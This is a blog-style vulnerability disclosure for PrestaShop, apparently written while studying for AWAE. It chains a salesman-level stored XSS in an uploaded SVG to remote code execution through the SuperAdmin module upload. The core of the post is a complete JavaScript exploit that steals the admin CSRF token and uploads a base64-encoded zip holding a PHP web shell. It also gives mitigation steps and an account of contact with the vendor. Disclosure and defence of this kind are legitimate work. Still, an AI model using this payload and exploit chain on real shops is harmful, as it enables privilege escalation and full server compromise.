Hi guys, I'am here to disclosure a vulnerability I found on prestashop, they said is hard to patch so they dont patched. The flaw is just a low-privilege auth XSS, but as prestashop allows SuperAdmins to load modules and themes, it's possible to get an RCE if we target this type of user.
Why Iam posting this?
Its more a study case, I Am currently studying to AWAE, and one o topics I see a lot on internet is about XSS to RCE, so I decide to give a try on some CMS's.
I try contact with prestashop team, and they said they accept this kind of "security issue", they also said is the same as allow SuperAdmins to upload .php files and get RCE, so they dont plan to fix this. I try to argue, but they relly dont believe this is a security issue.
Again, I'm not here to blame anyone, I really understand their side. I'm just demonstrating the "failure" and how you can disable the function that causes it if you don't use it.
The XSS
The XSS if pretty easy to spot, to exploit, we will use a user called salesman, he have the privilege to create products and reply to orders (Salesman can't get a RCE, he have no privilege to upload .php files).
This is my team on prestashop:
Step by Step to get a XSS
1 - Access the products tab under Catalog
2 - Select any product you want and go to insert/edit images
3 - In source you have the ability to upload SVG files
4 - The files you upload here are visible in /img/cms
5 - Just upload your best SVG XSS payload and access it in http://prestashop.local/img/cms/XSS.svg
How to get a RCE
Heres a javascript code that can upload a shell in http://your.prestashop.local/modules/shell/shell.php
const admin_url= "http://localhost/prestashop/admin386mdqdn3/";//Modify only this line
var token1;
var token2;
const content_type = "application/x-zip-compressed";
const shellb64 = "UEsDBAoAAAAAACyRzlIAAAAAAAAAAAAAAAAGAAAAc2hlbGwvUEsDBBQ"
shellb64 += "AAAAIAEuTzlJAl6iYVQAAAGsAAAAPAAAAc2hlbGwvc2hlbGwucGhws7EvyCjg5dLX0uLlUtB"
shellb64 += "SABMOiaUlGflFCkCQbFJmUmSQBxIGYX1eLl6uzDSNzOLi1BINlXh315Bo9eTcFPVYTU1ermq"
shellb64 += "gEiAoriwuSc1FlbXm5aoFAFBLAQIfAAoAAAAAACyRzlIAAAAAAAAAAAAAAAAGACQAAAAAAAA"
shellb64 += "AEAAAAAAAAABzaGVsbC8KACAAAAAAAAEAGACfgM+NYWHXAZ+Az41hYdcBL4QHi2Fh1wFQSwE"
shellb64 += "CHwAUAAAACABLk85SQJeomFUAAABrAAAADwAkAAAAAAAAACAAAAAkAAAAc2hlbGwvc2hlbGw"
shellb64 += "ucGhwCgAgAAAAAAABABgAMtw67GNh1wEy3DrsY2HXAZjcpxxhYdcBUEsFBgAAAAACAAIAuQA"
shellb64 += "AAKYAAAAAAA==";
const blob = base64toBlob(shellb64, content_type);
/* Kudos to Nolan from www.dubget.com for this function */
function base64toBlob(base64Data, contentType) {
contentType = contentType || '';
var sliceSize = 1024;
var byteCharacters = atob(base64Data);
var bytesLength = byteCharacters.length;
var slicesCount = Math.ceil(bytesLength / sliceSize);
var byteArrays = new Array(slicesCount);
for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
var begin = sliceIndex * sliceSize;
var end = Math.min(begin + sliceSize, bytesLength);
var bytes = new Array(end - begin);
for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
bytes[i] = byteCharacters[offset].charCodeAt(0);
}
byteArrays[sliceIndex] = new Uint8Array(bytes);
}
return new Blob(byteArrays, { type: contentType });
}
function reqListener () {
res1 = this.responseText;
console.log(res1);
token1 = res1.match(/_token=[a-zA-Z0-9\-]*/);
console.log(token1);
};
var oReq = new XMLHttpRequest();
oReq.onload = reqListener;
oReq.open("get", admin_url + "index.php/improve/modules/manage", true);
oReq.send();
setTimeout(function() {
var formData = new FormData();
formData.append('file_uploaded', blob, 'shell.zip');
var oReq3 = new XMLHttpRequest();
oReq3.open("post", admin_url + "index.php/improve/modules/import?" + token1[0], true);
oReq3.send(formData);
}, 3000);
Videos
Some PoCs showing how we (as a salesman user) can upload a malicious SVG file that when opened by a SuperAdmin trigger a interesting behavior
Priv esc PoC:
RCE PoC:
How to disable SVG files
If you believe you dont need SVG files to be upload by this function on your server, heres how to disable it
1 - open the file: prestashop/[Admin]/filemanager/config/config.php
2 - Line 106, remove 'svg' from the array $ext_img
If you try to upload any svg file, the application will denied it
If you want, you can also remove the mime type in line 117, from the array called $mime_img
Email's I send to prestashop team
Its a dup lol
After writing this article (before posting), I contacted prestashop again and asked for permission to post this article, they said someone has already done an article about it, so this is the original:
https://stazot.com/prestashop-csrf-to-rce-article/
A awesome work from @sivaneshashok
